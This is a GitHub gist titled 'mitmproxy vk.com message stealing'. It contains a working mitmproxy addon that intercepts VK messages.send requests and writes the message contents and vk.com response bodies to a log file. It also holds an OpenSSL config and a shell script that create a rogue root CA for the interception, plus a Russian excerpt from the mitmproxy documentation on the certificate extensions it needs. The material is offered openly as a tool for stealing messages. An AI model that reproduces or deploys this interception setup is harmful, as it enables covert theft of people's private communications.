Last active
October 1, 2024 20:28
-
-
Save andyollylarkin/3bc0b497bb679a304b668bdd3118f0bc to your computer and use it in GitHub Desktop.
mitmproxy vk.com message stealing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from mitmproxy import http | |
| def request(flow: http.HTTPFlow) -> None: | |
| if "messages.send" in flow.request.pretty_url: | |
| with open("requests.log", "a") as log_file: | |
| if flow.request.content: | |
| if "application/x-www-form-urlencoded" in flow.request.headers.get("Content-Type", ""): | |
| if flow.request.urlencoded_form['message']: | |
| log_file.write("Данные формы (URL-encoded):\n") | |
| log_file.write(f"{flow.request.urlencoded_form['message']}\n") | |
| elif "multipart/form-data" in flow.request.headers.get("Content-Type", ""): | |
| log_file.write("Данные формы (multipart):\n") | |
| for key, value in flow.request.multipart_form.items(): | |
| if key == "message": | |
| log_file.write(f"{key}: {value}\n") | |
| else: | |
| log_file.write(f"Тело запроса: {flow.request.text}\n") | |
| log_file.write("\n") | |
| def response(flow: http.HTTPFlow) -> None: | |
| if "vk.com" in flow.request.host: | |
| with open("requests.log", "a") as log_file: | |
| if flow.response.content: | |
| log_file.write(f"Тело ответа: {flow.response.text}\n") | |
| log_file.write("\n") |
Конфиг для генерации
[ ca ]
default_ca = CA_default
[ CA_default ]
default_md = sha256
[ req ]
prompt = no
default_bits = 2048
distinguished_name = req_distinguished_name
x509_extensions = v3_ca
[ req_distinguished_name ]
stateOrProvinceName = US
localityName = US
organizationName = GSSIGN
organizationalUnitName = GSSIGN
commonName = rootCA
emailAddress = [email protected]
[ v3_ca ] # раздел для расширений
keyUsage = critical, cRLSign, keyCertSign, digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth, clientAuth, emailProtection, timeStamping
basicConstraints = critical, CA:TRUE
Скрипт для генерации:
echo "Generate root CA key ...";
openssl genpkey -algorithm RSA -out root.key -pkeyopt rsa_keygen_bits:2048;
echo "Generate root CA certificate ...";
openssl req -x509 -new -nodes -key ./root.key -sha256 -days $DAYS -out ./root.crt -passin pass:$2 -config ./root.cnf;
cat ./root.key ./root.crt > ./full.pem;
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Из документации
При просмотре сертификата openssl x509 -noout -text -in ~/.mitmproxy/mitmproxy-ca.pem он должен иметь как минимум следующие расширения X509v3, чтобы mitmproxy мог использовать его для генерации сертификатов:
X509v3 extensions:
X509v3 Key Usage: critical
Certificate Sign
X509v3 Basic Constraints: critical
CA:TRUE